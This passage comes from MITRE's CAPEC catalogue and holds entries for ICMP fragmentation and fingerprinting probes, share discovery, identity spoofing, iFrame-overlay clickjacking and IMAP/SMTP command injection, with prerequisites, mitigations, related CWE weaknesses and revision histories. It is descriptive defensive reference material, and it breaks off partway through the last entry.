2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-496: ICMP Fragmentation

Attack Pattern ID: 496

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target.

Mitigations

This attack may be mitigated through egress filtering based on ICMP payload so a network is a "good neighbor" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling
404	Improper Resource Shutdown or Release

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-425] "ICMP Attacks Illustrated". <http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-296: ICMP Information Request

Attack Pattern ID: 296

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response.

Skills Required

[Level: Low]

The adversary needs to know certain linux commands for this type of attack.

Resources Required

Scanners or utilities that provide the ability to send custom ICMP queries.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 44-51. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-332: ICMP IP 'ID' Field Error Message Probe

Attack Pattern ID: 332

Abstraction: Detailed

View customized information:

Description

Extended Description

The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable."

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
204	Observable Response Discrepancy

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-262] Ofir Arkin. "A Remote Active OS Fingerprinting Tool using ICMP". The Sys-Security Group. 2002-04. <http://ofirarkin.files.wordpress.com/2008/11/login.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses, Resources_Required

CAPEC-331: ICMP IP Total Length Field Probe

Attack Pattern ID: 331

Abstraction: Detailed

View customized information:

Description

Extended Description

RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable."

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
204	Observable Response Discrepancy

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-262] Ofir Arkin. "A Remote Active OS Fingerprinting Tool using ICMP". The Sys-Security Group. 2002-04. <http://ofirarkin.files.wordpress.com/2008/11/login.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses, Resources_Required

CAPEC-643: Identify Shared Files/Directories on System

Attack Pattern ID: 643

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).

Skills Required

[Level: Low]

Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\remote system or net share).

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools.

Related Weaknesses

CWE-ID	Weakness Name
267	Privilege Defined With Unsafe Actions
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1135	Network Share Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Skills_Required
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns

CAPEC-151: Identity Spoofing

Attack Pattern ID: 151

Abstraction: Meta

View customized information:

Description

Extended Description

Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	195	Principal Spoof
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	665	Exploitation of Thunderbolt Protection Flaws
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	16	Dictionary-based Password Attack
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	50	Password Recovery Exploitation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	55	Rainbow Table Password Cracking
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	70	Try Common or Default Usernames and Passwords
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	509	Kerberoasting
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	555	Remote Services with Stolen Credentials
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	565	Password Spraying
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	568	Capture Credentials via Keylogger
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	644	Use of Captured Hashes (Pass The Hash)
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	645	Use of Captured Tickets (Pass The Ticket)
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	652	Use of Known Kerberos Credentials
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	701	Browser in the Middle (BiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The identity associated with the message or resource must be removable or modifiable in an undetectable way.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Authentication Access Control	Gain Privileges

Mitigations

Employ robust authentication processes (e.g., multi-factor authentication).

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-222: iFrame Overlay

Attack Pattern ID: 222

Abstraction: Detailed

View customized information:

Description

In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.

Extended Description

While being logged in to some target system, the victim visits the adversarys' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	103	Clickjacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Craft an iFrame Overlay page: The adversary crafts a malicious iFrame overlay page.
Techniques
The adversary leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.

Exploit

adversary tricks victim to load the iFrame overlay page: adversary utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.

Techniques
Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
Trick the victim to the malicious site through a cross-site scripting attack.

Trick victim into interacting with the iFrame overlay page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.
Techniques
Hide action controls over very commonly used functionality.
Hide action controls over very psychologically tempting content.

Prerequisites

The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system.

Skills Required

[Level: High]

Crafting the proper malicious site and luring the victim to this site is not a trivial task.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Configuration: Disable iFrames in the Web browser.

Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.

Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.

Example Instances

The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled "Don't Click." This button is aligned with the invisible "Update" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

References

[REF-84] Michal Zalewski. "Browser Security Handbook". Google Inc.. 2008. <https://code.google.com/archive/p/browsersec/wikis/Main.wiki>.

[REF-85] M. Mahemoff. "Explaining the "Don't Click" Clickjacking Tweetbomb". Software As She's Developed. 2009-02-12. <http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Execution_Flow, Extended_Description

CAPEC-183: IMAP/SMTP Command Injection

Attack Pattern ID: 183

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identify Target Web-Mail Server: The adversary first identifies the web-mail server they wish to exploit.

Experiment

Identify Vulnerable Parameters: Once the adversary has identified a web-mail server, they identify any vulnerable parameters by altering their values in requests. The adversary knows that the parameter is vulnerable if the web-mail server returns an error of any sort. Ideally, the adversary is looking for a descriptive error message.

Techniques
Assign a null value to a parameter being used by the web-mail server and observe the response.
Assign a random value to a parameter being used by the web-mail server and observe the response.
Add additional values to a parameter being used by the web-mail server and observe the response.
Add non standard special characters (i.e.: \, ', ", @, #, !, \|) to a parameter being used by the web-mail server and observe the response.
Eliminate a parameter being used by the web-mail server and observe the response.

Determine Level of Injection: After identifying all vulnerable parameters, the adversary determines what level of injection is possible.

Techniques
Evaluate error messages to determine what IMAP/SMTP command is being executed for the vulnerable parameter. Sometimes the actually query will be placed in the error message.
If there aren't descriptive error messages, the adversary will analyze the affected functionality to deduce the possible commands that could be being used by the mail-server.

Exploit

Inject IMAP/SMTP Commands: The adversary manipulates the vulnerable parameters to inject an IMAP/SMTP command and execute it on the mail-server.

Techniques
